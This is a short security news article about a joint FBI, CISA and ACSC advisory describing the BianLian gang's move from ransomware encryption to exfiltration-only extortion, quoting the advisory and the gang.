Share this article on:
The FBI, the Cybersecurity and Infrastructure Security Agency, and the Australian Cyber Security Centre have released a joint cyber security advisory on the changing tactics of the BianLian ransomware gang.
In fact, the advisory confirms what security researchers had observed back in March 2022 — namely that the gang is shifting away from ransomware operations and moving to strictly extortion-based campaigns against its targets.
BianLian has been active since at least June 2022 and is known to have targeted critical infrastructure in both Australia and the US. Its tactics include using Remote Desktop Protocol credentials alongside open source tools to encrypt and exfiltrate data via a number of methods, such as FTP or Rclone.
The group had used a double extortion methodology wherein it would both demand a ransom to release an encryption key to restore data and also to not publish the data it had exfiltrated.
However, following the release of a software tool by Avast to decrypt files without recourse to paying a ransom, the group started to move away from using ransomware. The new advisory confirms the change in tactics.
“In 2023, FBI observed BianLian shift to primarily exfiltration-based extortion with victims’ systems left intact, and ACSC observed BianLian shift exclusively to exfiltration-based extortion,” the advisory read. “BianLian actors warn of financial, business, and legal ramifications if payment is not made.”
Aside from contacting organisations by leaving a ransom note in the wake of its exfiltration operations, BianLian has used a number of other techniques to apply pressure on its victims. It has been known to target networked printers to share ransom notes en masse and to harass individual employees via phone.
But BianLian, as of March, maintains that while its intentions may be criminal, it still intends to be somewhat honourable about things.
“Our business depends on the reputation even more than many others,” the group has said in the past. “If we will take money and spread your information — we will have issues with payments in future. So, we will stick to our promises and reputation.”
“That works in both ways: if we said that we will email all your staff and publicly spread all your data — we will.”
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.